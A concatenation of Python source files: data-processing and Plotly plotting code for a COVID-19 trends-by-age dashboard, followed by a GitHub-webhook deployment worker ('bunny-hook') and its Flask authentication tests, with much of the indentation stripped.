        time interval (daily, weekly, biweekly, monthly, or none)
Returns
-----------
M : str list
        the list of corresponding metrics
"""
if interval == None:
I = ''
else:
I = interval
M = [I + metric if metric in ['Cases', 'Deaths', 'Tests']
else metric for metric in metrics ]
return M
def adaptDataframeHistogram(df, max_gap):
"""Builds dataframe used to display histogram
-----------
df : Pandas DataFrame
the original dataframe
max_gap : int
the latest authorized gap_in_day value
Returns
-----------
df : Pandas DataFrame
the corresponding dataframe
"""
df0 = df[df['gap_in_day'] <= max_gap].copy()
for age in range(0, 101, 10):
df1 = df0[df0['Age'] == age]
df0 = df0.drop(list(df1.index.values)[:-1])
return df0
def dfadaptDateRange(df, start_date, end_date):
"""Slices dataframe keeping values between start-date and end_date
Parameters:
-----------
-df : Pandas DataFrame
the dataset, asuming that it is sorted by date (with "Date_code")
-start_date : str
format : YYYY MM DD
-end_date : str
format : YYYY MM DD
Returns:
-----------
The coresponding dataset (pandas DataFrame)
"""
day1, month1, year1 = start_date[8:10], start_date[5:7], start_date[:4]
day2, month2, year2 = end_date[8:10], end_date[5:7], end_date[:4]
datecode1, datecode2 = int(year1 + month1 + day1), int(year2 + month2 + day2)
df0 = df[df['Date_code'] <= datecode2]
df0 = df0[df0['Date_code'] >= datecode1]
return df0
def computeRatio(indicator1, indicator2):
"""Computation of ratio of 2 inidcators.
Parameters:
-----------
    indicator1 : float
    indicator2 : float
Returns:
--------
Either None (division by zero)
Or the computed ratio (float)
"""
try:
ratio = indicator1 / indicator2
except ZeroDivisionError:
return None
else:
return ratio
def computeDateFormat(row):
"""Converts Date_code row into dates with US format (YYYY MM DD)
Parameters:
-----------
row : pandas Series
row of a dataset
Returns:
-----------
The date with the corresponding format (str)
"""
s = str(row.Date_code)
return s[:4] + '/' + s[4:6] + '/' + s[6:8]
def computeDatecode(row):
"""Creates a datecode (which permits sorting the dates ascending) for each row in the original dataset.
Parameters:
-----------
row : pandas Series
row of a dataset
Returns:
-----------
Either None (wrong date format)
Or the computed code (int)
"""
try:
day, month, year = row.Date[:2], row.Date[3:5], row.Date[6:10]
N = int(year + month + day)
except:
N = None
return N
def computeSource(s):
"""Deletes the non digit leters of a word (used to identify
different sources of data in the dataset)
Parameters:
-----------
row : pandas Series
row of a dataset
Returns:
-----------
The corresponding word (str)
"""
s = ''.join(i for i in s if not i.isdigit())
return s
def select_data(df, countries_list, regions_list, ages_list, genders_list):
"""Extracts from the dataset the data corresponding to many criterias.
Parameters:
-----------
df : Pandas DataFrame
dataset
countries_list : list of str
countries to be selected
regions_list : list of str
regions to be selected
ages_list : list of int
age ranges to be selected
genders_list : list of str
genders to be selected
Returns:
-----------
The corresponding dataset (pandas DataFrame)
"""
df0 = df[df['Country'].isin(countries_list)]
df1 = df0[df0['Region'].isin(regions_list)]
df2 = df1[df1['Age'].isin(ages_list)]
df3 = df2[df2['Sex'].isin(genders_list)]
return df3
def regions_of_country(df, list_of_countries):
"""Gives the list of the regions of a list of countries
Parameters:
-----------
-df : Pandas DataFrame
the original dataset
-list_of_countries : str list
the list of the countries to select
Returns:
-----------
The list of the regions (string list)
"""
if isinstance(list_of_countries, str):
list_of_countries = [list_of_countries]
L = list(
set(
df[df['Country'].isin(list_of_countries) ]['Region']
)
)
L = sorted(L)
try:
L.remove('All')
except ValueError:
pass
L = np.array(L)
return L
def meltDataframe(df):
"""Melting the df to get a 'Metric' columns with elements of metrics (list) as values
Parameters:
-----------
df : dataframe
dataframe to be transformed from wide to long format
Returns:
--------
df : Pandas dataframe
The coresponding dataframe
"""
df_long = df.melt(
id_vars = ['Date', 'Sex', 'Country', 'Region', 'Age', 'Date_code'],
var_name = 'Metric',
value_name = 'Value',
value_vars = ['Cases', 'Deaths', 'Tests', 'CFR', 'Tests by cases']
)
df_long = df_long[df_long['Value'] > 0.001]
return df_long
def compute_daily_metrics(df, metric):
"""Computes daily metrics from cumulative ones and inserts it in data frame in 'Metric' column
Parameters:
-----------
df : Pandas DataFrame
the original dataset
metric : the cumulative metric to use for computing daily one
Returns
-----------
df : Pandas Dataframe
the correspunding dataframe
"""
df0 = df[df['Metric'] == metric]
new_metric = 'Daily ' + metric
identities = list(
set(
df0['Country - Region - Age - Gender'].values
)
)
for ide in identities:
print(ide)
df1 = df0[df0['Country - Region - Age - Gender'] == ide]
L = [(index, row) for index, row in df1.iterrows()]
new_rows_list = []
for row_number in range(len(L) - 1):
row0 = L[row_number][1]
row1 = L[row_number+1][1]
for j in range(row0.gap_in_day + 1, row1.gap_in_day + 1):
new_row = row0.copy()
new_row.gap_in_day = j
new_row.Metric = new_metric
try:
new_row.Value = int(
100 * (row1.Value - row0.Value) / (row1.gap_in_day - row0.gap_in_day)
) / 100
except ZeroDivisionError:
new_row.Value = None
new_rows_list.append(new_row)
for i in range(len(new_rows_list)):
new_row = new_rows_list[i]
df.loc[-1] = new_row
df.index = df.index + 1
print('daily metric computed')
return df
def start_first_monday(df):
"""Slices the dataset keeping data dated after the first monday available
Parameters:
-----------
df : Pandas DataFrame
the original dataset
Returns
-----------
df : Pandas DataFrame
the corresponding dataset
"""
first_date_gap = df.iloc[0].gap_in_day
next_monday_gap = first_date_gap + (4 - first_date_gap % 7) % 7
df0 = df[df['gap_in_day'] >= next_monday_gap]
return df0
def compute_weekly_metrics(df, metric):
"""Computes weekly metrics from daily ones and inserts it in data frame in 'Metric' column
Parameters:
-----------
df : Pandas DataFrame
the original dataset
metric : the metric to use for computing weekly one
Returns
-----------
df : Pandas Dataframe
        the corresponding dataframe
"""
df0 = df[df['Metric'] == 'Daily ' + metric]
new_metric = 'Weekly ' + metric
identities = list(
set(
df0['Country - Region - Age - Gender'].values
)
)
for ide in identities:
df1 = df0[df0['Country - Region - Age - Gender'] == ide]
df1 = start_first_monday(df1)
L = [row for _, row in df1.iterrows()][1:]
for i in range((len(L) - 1) // 7):
value = sum([row.Value for row in L[7 * i: 7 * i + 7]])
for j in range(7 * i + 1, 7 * i + 8):
if j % 7 == 0:
row = L[j]
new_row = row.copy()
                    new_row[['gap_in_day', 'Metric', 'Value']] = row.gap_in_day, new_metric, value
df.loc[-1] = new_row
df.index = df.index + 1
else:
pass
print('weekly metric computed')
return df
def compute_biweekly_metrics(df, metric):
"""Computes biweekly metrics (14 days) from daily ones and inserts it in data frame in 'Metric' column
Parameters:
-----------
df : Pandas DataFrame
the original dataset
metric : the metric to use for computing biweekly one
Returns
-----------
df : Pandas Dataframe
        the corresponding dataframe
"""
df0 = df[df['Metric'] == 'Daily ' + metric]
new_metric = 'Biweekly ' + metric
identities = list(
set(
df0['Country - Region - Age - Gender'].values
)
)
for ide in identities:
df1 = df0[df0['Country - Region - Age - Gender'] == ide]
df1 = start_first_monday(df1)
L = [row for _, row in df1.iterrows()][1:]
for i in range((len(L) - 1) // 14):
value = sum([row.Value for row in L[14 * i: 14 * i + 14]])
for j in range(14 * i + 1, 14 * i + 15):
if j % 14 == 0:
row = L[j]
new_row = row.copy()
                    new_row[['gap_in_day', 'Metric', 'Value']] = row.gap_in_day, new_metric, value
df.loc[-1] = new_row
df.index = df.index + 1
print('biweekly metric computed')
return df
def start_first_of_the_month(df):
"""Slices the dataset keeping data dated after the first available first day of the month
and before the last avaible first day of the month
Parameters:
-----------
df : Pandas DataFrame
the original dataset
Returns
-----------
df : Pandas DataFrame
the corresponding dataset
"""
first_date_gap = df.iloc[0].gap_in_day
try:
first_of_month_gap = min([i - 1 for i in firsts_of_the_month if i - 1 >= first_date_gap])
    except ValueError:
return df
last_date_gap = df.iloc[-1].gap_in_day
try:
last_of_month_gap = min([i - 1 for i in firsts_of_the_month if i >= last_date_gap])
    except ValueError:
return df
df = df[df['gap_in_day'] >= first_of_month_gap]
df = df[df['gap_in_day'] <= last_of_month_gap]
return df
def compute_monthly_metrics(df, metric):
"""Computes monthly metrics from daily ones and inserts it in data frame in 'Metric' column
Parameters:
-----------
df : Pandas DataFrame
the original dataset
metric : the metric to use for computing monthly one
Returns
-----------
df : Pandas Dataframe
the correspunding dataframe
"""
df0 = df[df['Metric'] == 'Daily ' + metric]
new_metric = 'Monthly ' + metric
identities = list(
set(
df0['Country - Region - Age - Gender'].values
)
)
for ide in identities:
df1 = df0[df0['Country - Region - Age - Gender'] == ide]
df1 = start_first_of_the_month(df1)
checkpoint = 0
L = [row for _, row in df1.iterrows()][1:]
try:
first_month_number = firsts_of_the_month.index(L[0].gap_in_day)
except IndexError:
continue
for i in range((len(L) - 1) // 30):
month_number = first_month_number + i
month_length = firsts_of_the_month[month_number + 1] - firsts_of_the_month[month_number]
value = sum([row.Value for row in L[checkpoint: checkpoint + month_length]])
            checkpoint += month_length
            row = L[checkpoint - 2]
new_row = row.copy()
            new_row[[
                'gap_in_day',
                'Date_code',
                'Metric',
                'Value'
            ]] = row.gap_in_day, computeDatecodeFromGap(row.gap_in_day), new_metric, value
df.loc[-1] = new_row
df.index = df.index + 1
print('monthly metric computed')
return df
def build_time_metrics(df):
"""Builds time metrics from dataframe containing cumulative metrics
Parameters:
-----------
df : Pandas DataFrame
the original dataset (assumed to have one 'Metric' column (long format))
Returns
-----------
    df : Pandas DataFrame
        the corresponding DataFrame with the new metrics (long format)
"""
for metric in ['Deaths', 'Cases', 'Tests']:
df = compute_daily_metrics(df, metric)
df = compute_weekly_metrics(df, metric)
df = compute_biweekly_metrics(df, metric)
df = compute_monthly_metrics(df, metric)
return df
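# Hypothetical pipeline sketch (names as defined above): the intent is to run
#     df = build_time_metrics(df)
# once over the cumulative long-format data before any plotting.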
def regression(df, degree, forecast, by_pop):
"""Computes polynomal regressions on plotted data
Parameters:
-----------
df : Pandas DataFrame
        the dataset, assumed to have one 'Metric' column
degree: int
degree of the polynomial regression
forecast : int
the number of days to forecast
    by_pop : bool
        if True, use values per million inhabitants;
        otherwise use gross values
Returns:
-----------
    regressions_list : (numpy array, numpy array) list
        the list of models obtained by regression
"""
    if by_pop:
V = 'Value_by_pop'
else:
V = 'Value'
metrics = list(
set(
df['Metric'].values
)
)
regressions_list = []
for metric in metrics:
df0 = df[df['Metric'] == metric]
identities = list(
set(
df0['Country - Region - Age - Gender'].values
)
)
for ide in identities:
df1 = df0[df0['Country - Region - Age - Gender'] == ide]
x = np.array(
df1['gap_in_day']
)
y = np.array(
df1[V]
)
X = x[:, np.newaxis]
model = make_pipeline(
PolynomialFeatures(degree),
Ridge()
)
model.fit(X, y)
x_plot = np.linspace(
min(x),
max(df1['gap_in_day']) + forecast,
1000
)
X_plot = x_plot[:, np.newaxis]
regressions_list.append(
(x_plot, model.predict(X_plot))
)
return regressions_list
def regression_histogram(df, degree):
"""Computes polynomal regressions on data of the histogram
Parameters:
-----------
df : Pandas DataFrame
        the dataset, assumed to have one 'Metric' column
degree: int
degree of the polynomial regression
Returns:
-----------
X, Y : numpy arrays
        the model obtained by regression
"""
x = np.array(
df['Age']
)
y = np.array(
df['Value']
)
X = x[:, np.newaxis]
model = make_pipeline(
PolynomialFeatures(degree),
Ridge()
)
model.fit(X, y)
x_plot = np.linspace(
min(x),
max(x),
1000
)
X_plot = x_plot[:, np.newaxis]
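    # Shift x by 5 so the fitted curve lines up with the 10-year histogram bin
    # centers (the histogram draws its ticks at 10 * i + 5).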
X, Y = (x_plot + 5, model.predict(X_plot))
return X, Y
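if __name__ == '__main__':
    # Minimal smoke test for regression_histogram (an illustrative sketch, not
    # part of the app; assumes this module's numpy/sklearn imports and that
    # pandas is installed -- the synthetic frame below is made up).
    import pandas as pd
    demo = pd.DataFrame({'Age': [0, 10, 20, 30, 40], 'Value': [1, 4, 9, 16, 25]})
    X, Y = regression_histogram(demo, degree=2)
    print(X[:3], Y[:3])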
```
#### File: COVID19_Trends_by_Age/src/plots.py
```python
import pandas as pd
from math import isnan
import plotly.graph_objects as go
import plotly.express as px
from src.mysettings import label_dic, months_list, code_state, code_country, firsts_of_the_month
from src.helpers import select_data, regions_of_country, dfadaptDateRange,computeDateFormat, regression, computeDatecode, adaptDataframeHistogram, ageRange, regression_histogram
from src.preprocess import divide_US_Dataframe
def plot_metrics(df, countries_list, regions_list, ages_list, genders_list,
metrics, logvalue, start_date, end_date, rug_value,
reverse, trend, forecast, unit, table_option
):
"""Plotting several metrics (e.g cases, deaths or tests) depending on criteria (parameters)
Parameters:
-----------
df : Pandas DataFrame
the original dataset
countries_list : str list
the list of the countries to select
regions_list : str list
the list of the region to select
ages_list : int list
the list of the age ranges to select
genders_list : str list
the list of the genders to select
metrics : str list
the metrics that we want to plot
logvalue : bool
activates logarithmic scale for y axis
start_date : str
the first date to be considered
end_date : str
the last date to be considered
rug_value : bool
activates the rug plot option
reverse : bool
activates the reverse axis option
trend : int
        the degree of the polynomial used to model the trend
    forecast : int
        the number of forecasted days to display
unit : str
        the unit used to divide the data
table_option : bool
activates the table displaying option
Returns:
--------
fig : plotly Figure
the corresponding plot
"""
if 'All' in regions_list and ('UK' in countries_list) :
# df0 = delete_multiple_sources(df, ages_list, genders_list)
df0 = df
else:
df0 = df
df0 = select_data(
df,
countries_list,
regions_list,
ages_list,
genders_list
)
df0 = dfadaptDateRange(df0, start_date, end_date)
df0 = df0[df0['Metric'].isin(metrics)]
df0[['Date_format', 'Metric', 'Value', 'Country', 'Region', 'Age', 'Sex']].to_csv('data/download/data_download.csv')
if df0.empty:
fig = go.Figure(
go.Indicator(
title = {"text" : "No data available"}
)
)
fig.update_layout(paper_bgcolor = "rgba(188,188,188, 0.33)")
return fig
elif table_option:
fig = go.Figure(data=
[
go.Table(header = dict(
values = list(['Date', 'Metric', 'Value', 'Country', 'Region', 'Age', 'Gender']),
fill_color = 'rgba(0,131,138,0.5)',
),
cells = dict(
values=[df0.Date_format, df0.Metric, df0.Value, df0.Country, df0.Region, df0.Age, df0.Sex],
fill_color = 'white',
)
)
]
)
fig.update_layout(autosize=False,
width= 1425,
height=710,
)
return fig
else:
pass
if unit == 'Per million inhabitants' and regions_list == ['All']:
unit_tag = ' (Per million inhabitants)'
Y = df0['Value_by_pop']
else:
unit_tag = ''
Y = df0['Value']
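    # When the reverse option is on, swap the axes so dates run along y.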
if reverse:
        X, Y = Y, df0['gap_in_day']
    else:
        X, Y = df0['gap_in_day'], Y
if regions_list == ['All']:
region_tag = ''
else:
region_tag = ' (Regions)'
fig = px.scatter(df0,
x = X,
y = Y,
log_y = logvalue,
opacity = 1 / (len(metrics) ** 0.2),
color = 'Country - Region - Age - Gender',
symbol = 'Metric',
symbol_sequence = ['circle', 'cross', 'x', 'star-triangle-up', 'star', 'diamond', 'hexagon'],
hover_name = 'Country - Region - Age - Gender',
labels = {
'Date_format' : 'Date',
'gap_in_day' : 'Date',
'Value_by_pop' : 'Value by M inhabitants'
},
hover_data = {
'gap_in_day' : True,
'Date' : False,
'Date_format' : True,
'Metric' : True,
'Value' : True,
'Country - Region - Age - Gender' : False,
},
title = 'COVID-19 : ' + ', '.join(metrics) + ' in '+ ', '.join(countries_list) + region_tag,
marginal_y = rug_value,
template = 'plotly_white',
)
fig.update_traces(marker = dict(
size = 8,
line = dict(
width = .25,
color ='grey'
)
),
selector = dict(mode = 'markers')
)
fig.update_layout(
autosize = False,
width = 1425,
height = 710,
)
if reverse:
fig.update_yaxes(
tickvals = [i - 1 for i in firsts_of_the_month],
            ticktext = [i + ' 2020' for i in months_list],
tickwidth = 2,
tickcolor = 'grey',
ticklen = 10,
col = 1,
showline = True,
linewidth = 2,
linecolor = 'black',
title_font = dict(size = 18),
)
x_axis = ', '.join(
[label_dic[i] for i in metrics]
) + unit_tag
fig.update_xaxes(
showline = True,
linewidth = 2,
linecolor = 'black',
title_text = x_axis,
title_font = dict(size = 18),
)
else:
fig.update_xaxes(
tickvals = [i - 1 for i in firsts_of_the_month],
            ticktext = [i + ' 2020' for i in months_list],
tickwidth = 2,
tickcolor = 'grey',
ticklen = 10,
col = 1,
showline = True,
linewidth = 2,
linecolor = 'black',
title_font = dict(size = 18),
)
y_axis = ', '.join(
[label_dic[i] for i in metrics]
) + unit_tag
fig.update_yaxes(
showline = True,
linewidth = 2,
linecolor = 'black',
title_text = y_axis,
title_font = dict(size = 18),
)
    if trend > 0:
reg = regression(df0, trend, forecast, unit == 'Per million inhabitants')
for X, Y in reg:
if reverse:
Y, X = X, Y
else:
pass
fig.add_trace(
go.Scatter(
x = X,
y = Y,
mode = 'lines',
line = {
'color' : 'DarkSlateGrey',
'width' : 2
},
name = '',
showlegend = False
)
)
else:
pass
return fig
def plot_histogram(df, country, region, gender, metric,
logvalue, trend, table_option, end_date
):
"""Plotting histogram by age ranges depending on criteria (parameters)
Parameters:
-----------
df : Pandas DataFrame
the original dataset
country : str
        the selected country
region : str
the selected region
gender : str
the selected gender
    metric : str
the selected metric
logvalue : bool
activates logarithmic scale for y axis
trend : int
        the degree of the polynomial used to model the trend
table_option : bool
activates the table displaying option
end_date : int
gap_in_day value of the last date to consider
Returns:
--------
fig : plotly Figure
the corresponding plot
"""
df0 = df.copy()
df0 = select_data(
df,
[country],
[region],
        [i * 10 for i in range(11)],
[gender]
)
df0 = df0[df0['Metric'] == metric]
df0 = adaptDataframeHistogram(df0, end_date)
if df0.empty:
fig = go.Figure(
go.Indicator(
title = {"text" : "No data available"}
)
)
fig.update_layout(paper_bgcolor = "rgba(188,188,188, 0.33)")
return fig
elif table_option:
fig = go.Figure(data=
[
go.Table(header = dict(
values = list(['Date', 'Metric', 'Value', 'Country', 'Region', 'Age', 'Gender']),
fill_color = 'rgba(0,131,138,0.5)',
),
cells = dict(
values=[df0.Date_format, df0.Metric, df0.Value, df0.Country, df0.Region, df0.Age, df0.Sex],
fill_color = 'white',
)
)
]
)
fig.update_layout(
autosize=False,
width= 1425,
height=710,
)
return fig
else:
if region == 'All':
region_tag = ''
else:
region_tag = region + ', '
df0['Age range'] = df0.apply(ageRange, axis = 1)
        df0 = df0.sort_values(by = ['Date_code'], ascending=False)
fig = px.histogram(
df0,
x = 'Age',
y = 'Value',
category_orders = {
'Age': [10*i for i in range(11)],
},
color = 'Date_format',
template = 'simple_white',
log_y = logvalue,
title = 'COVID-19 : ' + metric + ' in ' + region_tag + country,
nbins = 11,
color_discrete_sequence=['rgba(0,131,138,0.87)', 'rgba(0,166,170,0.87)'],
labels = {
'Date_format' : 'Latest data : ',
},
)
fig.update_layout(
autosize = False,
width = 1425,
height = 710,
)
fig.update_layout(hovermode = "x unified")
fig.update_traces(hovertemplate = None)
fig.update_xaxes(
tickvals = [10 * i + 5 for i in range(11)],
            ticktext = [str(10 * i) + ' - ' + str(10 * i + 9) + ' y.o' for i in range(10)] + ['100 - 105 y.o'],
tickwidth = 0,
ticklen = 0,
showline = True,
linewidth = 2,
linecolor = 'black',
title_font = dict(size = 18),
)
y_axis = ', '.join(
[label_dic[i] for i in [metric]]
)
fig.update_yaxes(
showline = True,
linewidth = 2,
linecolor = 'black',
title_text = y_axis,
title_font = dict(size = 18),
)
if trend > 0:
X, Y = regression_histogram(df0, trend)
fig.add_trace(
go.Scatter(
x = X,
y = Y,
mode = 'lines',
line = {
'color' : 'DarkSlateGrey',
'width' : 2
},
name = '',
showlegend = False
)
)
return fig
def plot_usa_map(df, age, gender, metric, selected_unit, end_date):
"""Plotting choropleth map of the USA depending on criteria (parameters)
Parameters:
-----------
df : Pandas DataFrame
the original dataset
age : int
the age range to select
gender : str
        the gender to select
metric : str
the metric that we want to plot
selected_unit : str
the selected unit with which data is divided
end_date : str
the last date to be considered
Returns:
--------
fig : plotly Figure
the corresponding plot
"""
States = regions_of_country(df,['USA'])
df0 = select_data(
df,
['USA'],
States,
[age],
[gender]
)
df0['Date_code'] = df0.apply(computeDatecode, axis = 1)
df0['Date_format'] = df0.apply(computeDateFormat, axis = 1)
df0 = df0.sort_values(by = ['Date_code'])
df0 = df0[df0['Metric'] == metric]
df0 = df0[df0['gap_in_day'] <= end_date]
values_list = []
dates_list = []
for state in States:
df1 = select_data(
df0,
['USA'],
[state],
[age],
[gender]
)
df1 = divide_US_Dataframe(df1, selected_unit)
if len(df1) == 0:
values_list.append('nan')
dates_list.append('nan')
else:
index = len(df1) - 1
value = list(df1['Value'])[index]
date = list(df1['Date_format'])[index]
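            # Walk back from the newest row until a non-NaN value is found.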
while isnan(value) and index > 0:
index -= 1
value = list(df1['Value'])[index]
date = list(df1['Date_format'])[index]
values_list.append(value)
dates_list.append(date)
Code = [code_state[state] for state in States]
df2 = pd.DataFrame(
{'state' : States, 'code' : Code, 'Value' : values_list, 'Date' : dates_list}
)
for col in df2.columns:
df2[col] = df2[col].astype(str)
df2['text'] = df2['state'] + '<br>' + 'Value : ' + df2['Value'] + '<br>' + df2['Date'] + '<br>' + metric
fig = go.Figure(
data=go.Choropleth(
locations = df2['code'],
z = df2['Value'].astype(float),
locationmode = 'USA-states',
colorscale = 'Reds',
autocolorscale = False,
text = df2['text'],
marker_line_color = 'rgb(0, 131, 138)',
colorbar_title = metric,
hoverinfo = 'text',
)
)
if selected_unit == 'Per million inhabitants':
unit_tag = ' (Per million inhabitants)'
else:
unit_tag = ''
fig.update_layout(
title_text = 'Number of ' + metric + ' by state ' + 'for ' +
str(age) + ' - ' + str(age + 9) + ' year olds' + unit_tag,
geo = dict(
scope='usa',
projection = go.layout.geo.Projection(type = 'albers usa'),
showlakes = False,
lakecolor = 'rgb(255, 255, 255)'
),
    )
fig.update_layout(
autosize=False,
width= 1425,
height=710
)
return fig
def plot_world_map(df, age, gender, metric, selected_unit, end_date):
"""Plotting choropleth world map depending on criteria (parameters)
Parameters:
-----------
df : Pandas DataFrame
the original dataset
age : int
the age range to select
gender : str
        the gender to select
metric : str
the metric that we want to plot
selected_unit : str
the selected unit with which data is divided
end_date : str
the last date to be considered
Returns:
--------
fig : plotly Figure
the corresponding plot
"""
Countries = list(
set(
df['Country']
)
)
    for country in ['England and Wales', 'England', 'Scotland', 'Northern Ireland', 'Senegal', 'Eswatini']:  # England, Scotland, and N. Ireland are already included in the UK data
try:
Countries.remove(country)
except ValueError:
pass
df0 = select_data(
df,
Countries,
['All'],
[age],
[gender]
)
df0['Date_code'] = df0.apply(computeDatecode, axis = 1)
df0 = df0.sort_values(by = ['Date_code'])
df0['Date_format'] = df0.apply(computeDateFormat, axis = 1)
df0 = df0[df0['Metric'] == metric]
df0 = df0[df0['gap_in_day'] <= end_date]
values_list = []
dates_list = []
for country in Countries:
df1 = select_data(
df0,
[country],
['All'],
[age],
[gender]
)
if selected_unit == 'Per million inhabitants':
column = 'Value_by_pop'
else:
column = 'Value'
if len(df1) == 0:
values_list.append('nan')
dates_list.append('nan')
else:
            index = len(df1) - 1
value = list(df1[column])[index]
date = list(df1['Date_format'])[index]
while isnan(value) and index > 0:
index -= 1
value = list(df1[column])[index]
date = list(df1['Date_format'])[index]
values_list.append(value)
dates_list.append(date)
Code = [code_country[country] for country in Countries]
df2 = pd.DataFrame(
{'Country' : Countries, 'code' : Code, 'Value' : values_list, 'Date' : dates_list}
)
for col in df2.columns:
df2[col] = df2[col].astype(str)
df2['text'] = df2['Country'] + '<br>' + 'Value : ' + df2['Value'] + '<br>' + df2['Date'] + '<br>' + metric
fig = go.Figure(
data = go.Choropleth(
locations = df2['code'],
z = df2['Value'],
hoverinfo = 'text',
text = df2['text'],
colorscale = 'Reds',
marker_line_color = 'rgb(0, 131, 138)',
colorbar_title = metric,
)
)
if selected_unit == 'Per million inhabitants':
unit_tag = ' (Per million inhabitants)'
else:
unit_tag = ''
fig.update_layout(
title_text = 'Number of ' + metric + ' by country ' + 'for ' +
str(age) + ' - ' + str(age + 9) + ' year olds' + unit_tag,
geo = dict(
showframe = False,
showcoastlines = True,
),
)
fig.update_layout(
autosize = False,
width = 1425,
height = 710
)
return fig
def build_download_file(df, countries_list, regions_list, ages_list, genders_list,
metrics, start_date, end_date
):
if 'All' in regions_list and ('UK' in countries_list) :
# df0 = delete_multiple_sources(df, ages_list, genders_list)
df0 = df
else:
df0 = df
df0 = select_data(
df,
countries_list,
regions_list,
ages_list,
genders_list
)
df0 = dfadaptDateRange(df0, start_date, end_date)
df0 = df0[df0['Metric'].isin(metrics)]
df0 = df0[['Date_format', 'Metric', 'Value', 'Country', 'Region', 'Age', 'Sex']]
print(df0.head())
# elif table_option:
# fig = go.Figure(data=
# [
# go.Table(header = dict(
# values = list(['Date', 'Metric', 'Value', 'Country', 'Region', 'Age', 'Gender']),
# fill_color = 'rgba(0,131,138,0.5)',
# ),
# cells = dict(
# values=[df0.Date_format, df0.Metric, df0.Value, df0.Country, df0.Region, df0.Age, df0.Sex],
# fill_color = 'white',
# )
# )
# ]
# )
# fig.update_layout(autosize=False,
# width= 1425,
# height=710,
# )
return None
```
|
{
"source": "jeancochrane/bunny-hook",
"score": 2
}
|
#### File: bunny-hook/api/worker.py
```python
import os
import subprocess
import logging
import sys
import shutil
import yaml
from api.exceptions import WorkerException
from api.payload import Payload
# Log to stdout
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
class Worker(object):
'''
Perform a build based on a GitHub API payload.
'''
def __init__(self, payload):
'''
Initialize the Worker with attributes from the payload that are
necessary for cloning the repo.
'''
self.payload = Payload(payload)
self.repo_name = self.payload.get_name()
self.origin = self.payload.get_origin()
self.branch = self.payload.get_branch()
def run_command(self, cmd):
'''
Helper method that wraps `subprocess.run` to run commands and fail noisily.
'''
try:
return subprocess.run(cmd, check=True, universal_newlines=True)
except subprocess.CalledProcessError as e:
raise WorkerException(str(e))
def run_script(self, script_path):
'''
Run a shell script from a file.
This should probably have some more sophisticated permissioning (e.g.
chrooting) before going live.
'''
# Make script executable -- Python chmod docs:
# https://docs.python.org/3/library/stat.html#stat.S_IXOTH
os.chmod(script_path, 0o775)
return self.run_command(['bash', script_path])
def deploy(self, tmp_path=None):
'''
Run build and deployment based on the config file.
'''
logging.info('Deploying %s' % self.repo_name)
if not tmp_path:
# Default to /tmp/<repo-name>
tmp_path = os.path.abspath(os.path.join(os.sep, 'tmp', self.repo_name))
# If the repo exists already in the tmp path, remove it
if os.path.exists(tmp_path):
logging.info('Updating work in %s...' % tmp_path)
self.run_command(['git', '-C', tmp_path, 'fetch', '--depth=1', 'origin', self.branch])
self.run_command(['git', '-C', tmp_path, 'checkout', self.branch])
            self.run_command(['git', '-C', tmp_path, 'reset', '--hard', 'origin/' + self.branch])
else:
logging.info('Cloning {origin} into {tmp_path}...'.format(origin=self.origin,
tmp_path=tmp_path))
self.run_command(['git', 'clone', '--depth=1', '--branch', self.branch, self.origin, tmp_path])
self.run_command(['git', '-C', tmp_path, 'checkout', self.branch])
# Check for a yaml file
yml_file = os.path.join(tmp_path, 'deploy.yml')
yaml_file = os.path.join(tmp_path, 'deploy.yaml')
if not (os.path.isfile(yml_file) or os.path.isfile(yaml_file)):
raise WorkerException('Could not locate a `deploy.yml` file in your repo.')
if os.path.isfile(yml_file) and os.path.isfile(yaml_file):
raise WorkerException('Found two config files in this repo! Delete one and try again.')
if os.path.isfile(yml_file):
config_file = yml_file
else:
config_file = yaml_file
# Parse the config file
logging.info('Loading config file from %s...' % config_file)
with open(config_file) as cf:
            config = yaml.safe_load(cf)
if not config:
raise WorkerException('Deployment file %s appears to be empty' % config_file)
clone_path = config.get('home')
prebuild_scripts = config.get('prebuild', [])
build_scripts = config.get('build', [])
deploy_scripts = config.get('deploy', [])
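        # Illustrative deploy.yml shape, per the config.get() calls above (the
        # paths below are made up):
        #   home: /srv/my-site
        #   prebuild:
        #     - scripts/install.sh
        #   build:
        #     - scripts/build.sh
        #   deploy:
        #     - scripts/publish.sh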
# Enforce required directives
if not clone_path:
raise WorkerException('Deployment file %s is missing `home` directive' % config_file)
# Move repo from tmp to the clone path
logging.info('Moving repo from {tmp_path} to {clone_path}...'.format(tmp_path=tmp_path,
clone_path=clone_path))
self.run_command(['rsync', '-avz', '--delete', tmp_path, clone_path])
# Run prebuild scripts, if they exist
for script in prebuild_scripts:
script_path = os.path.join(clone_path, script)
logging.info('Running prebuild script %s...' % script_path)
self.run_script(script_path)
# Run build scripts, if they exist
for script in build_scripts:
script_path = os.path.join(clone_path, script)
logging.info('Running build script %s...' % script_path)
self.run_script(script_path)
# Run deploy scripts, if they exist
for script in deploy_scripts:
script_path = os.path.join(clone_path, script)
logging.info('Running deployment script %s...' % script_path)
self.run_script(script_path)
logging.info('Finished deploying %s!' % self.repo_name)
logging.info('---------------------')
return True
```
#### File: bunny-hook/tests/test_app.py
```python
from unittest import TestCase
from contextlib import contextmanager
import json
from flask import appcontext_pushed, g
from werkzeug.datastructures import Headers
import env
import api
from api.routes import get_hmac
from test_secrets import TOKENS
class TestAPI(TestCase):
@classmethod
def setUpClass(cls):
'''
Set up some class-wide attributes for testing.
'''
api.app.testing = True
cls.app = api.app.test_client()
cls.tokens = TOKENS
# Good and bad authentication credentials
cls.good_sig = get_hmac(cls.tokens[0])
cls.bad_sig = get_hmac('bogus token')
@contextmanager
def authenticate(self):
'''
Inject fake security tokens into the app context for testing.
'''
def handler(sender, **kwargs):
g.tokens = self.tokens
with appcontext_pushed.connected_to(handler, api.app):
yield
def test_successful_request(self):
'''
Test a successful request.
'''
post_data = json.dumps({
'ref': 'refs/head/master',
'repository': {
'name': 'test-repo'
}
})
headers = Headers()
headers.add('X-Hub-Signature', self.good_sig)
with self.authenticate():
post_request = self.app.post('/hooks/github/master',
content_type='application/json',
data=post_data,
headers=headers)
self.assertEqual(post_request.status_code, 202)
response = json.loads(post_request.data.decode('utf-8'))
expected = 'Build started for ref refs/head/master of repo test-repo'
self.assertEqual(response.get('status'), expected)
def test_authentication_failed(self):
'''
Test a bad request where the secret token doesn't authenticate.
'''
post_data = json.dumps({
'ref': 'refs/head/master',
'repository': {
'name': 'test-repo'
}
})
headers = Headers()
headers.add('X-Hub-Signature', self.bad_sig)
with self.authenticate():
post_request = self.app.post('/hooks/github/master',
content_type='application/json',
data=post_data,
